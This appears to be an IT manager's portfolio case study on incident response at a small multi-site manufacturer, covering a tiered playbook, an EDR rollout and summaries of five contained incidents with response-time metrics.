5 real security incidents investigated and contained as IT Manager at a multi-site manufacturing company. MTTR reduced from 48 hours to 6 hours through formal IR playbook development, SentinelOne deployment, and repeatable containment procedures.
| Field | Detail |
|---|---|
| Organization | Multi-site manufacturing company, 4 locations, ~100 endpoints (anonymized) |
| Role | IT Manager — sole security responder |
| Incidents investigated | 5 security events over 18-month period |
| Baseline MTTR (inherited) | 48 hours (incidents discovered days late, no formal process) |
| Post-improvement MTTR | 6 hours (SentinelOne deployed, playbooks active) |
| Outcome | All 5 incidents contained; zero data exfiltration confirmed; zero production downtime from any security event |
When I joined the organization, there was no formal incident response process. Security events were discovered by end users reporting performance issues or strange behavior — not by any detection tooling. The previous AV (legacy signature-based) generated no meaningful alerts and had no centralized dashboard. When something happened, the response was ad hoc: an IT ticket was opened, someone looked at the machine, and decisions were made without a structured process or documentation.
Five security events had occurred in the 12 months prior to my joining. None had a formal post-mortem. Two involved compromised credentials; one involved malware on a production-floor machine that wasn't identified for several days after the initial infection. The absence of detection tooling, centralized logging, and any IR playbook meant the organization was operationally blind to its own threat landscape.
The first step was eliminating the detection gap. Legacy AV was replaced with SentinelOne Singularity across all 100+ endpoints — providing behavioral AI detection, centralized telemetry, and the ability to isolate endpoints remotely. (Full deployment write-up: SentinelOne EDR Deployment.) With SentinelOne active, previously-invisible threats became immediately visible and actionable.
I documented a tiered IR playbook based on the NIST SP 800-61 framework, adapted for a small IT team operating without a dedicated security team:
| Priority | Trigger | SLA | Actions |
|---|---|---|---|
| P1 — Critical | Active ransomware, confirmed lateral movement, data exfiltration indicators | 15 min to isolate | Immediate network isolation via SentinelOne remote kill; escalate to management; begin forensic preservation |
| P2 — High | Credential harvesting, suspicious PowerShell, unauthorized admin activity | 1 hour to triage | Review SentinelOne telemetry; isolate if confirmed malicious; password reset for affected accounts |
| P3 — Medium | Phishing email opened (no payload), suspicious outbound connection, unauthorized software | 4 hours to review | Review logs; user awareness notification; block indicator at firewall if applicable |
| P4 — Low | Policy violations, failed auth spikes, AV detection of known-benign PUP | Next business day | Log, document, communicate to affected user |
| Field | Detail |
|---|---|
| Detection method | User reported suspicious email; Entra ID Identity Protection flagged sign-in from anomalous location |
| Finding | User credentials captured via fake M365 login page; attacker successfully authenticated once from Eastern Europe before MFA block (legacy auth was still active — used as MFA bypass) |
| Containment | Immediately revoked all active sessions; forced password reset; blocked sign-in pending investigation |
| Scope determination | Reviewed M365 audit logs — no email forwarding rules, no data export, no mailbox delegation changes. Single unauthorized sign-in confirmed, no persistence established. |
| Remediation | Legacy authentication blocked for all users (accelerated timeline from planned M365 hardening project); MFA re-enrolled on compliant device only |
| MTTR | 4.5 hours (detection to confirmed containment) |
| Field | Detail |
|---|---|
| Detection method | SentinelOne behavioral detection — flagged execution of obfuscated PowerShell spawned from a macro-enabled Excel document |
| Finding | User opened emailed Excel file containing macro payload; PowerShell attempted to download a second stage from an external domain (blocked by firewall egress rules) |
| Containment | SentinelOne auto-quarantined the malicious file; machine isolated from network via SentinelOne remote action within 8 minutes of alert |
| Scope determination | No lateral movement attempted (network isolation meant no AD authentication); no second stage downloaded (outbound blocked). Contained to single endpoint. |
| Remediation | Machine wiped and reimaged; user awareness training; macro execution blocked via GPO for all non-IT workstations; file hash shared to SentinelOne blacklist |
| MTTR | 3.5 hours (alert to fully remediated machine) |
| Field | Detail |
|---|---|
| Detection method | FortiAnalyzer flagged after-hours VPN authentication from a terminated employee's credentials |
| Finding | Former contractor still had valid VPN credentials 3 weeks post-termination — credentials were shared across multiple people and the shared account wasn't deprovisioned on offboarding |
| Containment | VPN account immediately disabled; all active VPN sessions terminated; reviewed FortiAnalyzer logs for all activity during unauthorized session |
| Scope determination | Session lasted 22 minutes; accessed two file shares (read only); no data was exfiltrated to external destination per FortiAnalyzer egress log review |
| Remediation | Audited all VPN accounts; eliminated shared credentials; tied all VPN access to individual M365 identities with MFA required; implemented offboarding checklist with IT sign-off requirement |
| MTTR | 6 hours (detection to confirmed no data loss, process remediation complete) |
Two additional incidents — one involving a ransomware pre-cursor (Cobalt Strike beacon activity detected and contained before stage 2) and one involving a compromised vendor account used to send internal phishing emails — were both contained within the 6-hour MTTR target. Both were detected proactively by SentinelOne and FortiAnalyzer rather than by user reports, demonstrating the direct impact of the detection tooling deployment.
| Metric | Before | After |
|---|---|---|
| Mean Time to Detect | Hours to days (user-reported) | Minutes (SentinelOne / FortiAnalyzer automated detection) |
| Mean Time to Respond | No formal process — ad hoc response | 15-min P1 SLA; active playbook for each severity tier |
| Mean Time to Recover | 48 hours average | 6 hours average |
| Post-incident documentation | None | Formal incident report for every event; lessons-learned review |
| Repeat incidents (same root cause) | Recurring (no root cause elimination) | Zero repeat incidents — each event drove a control improvement |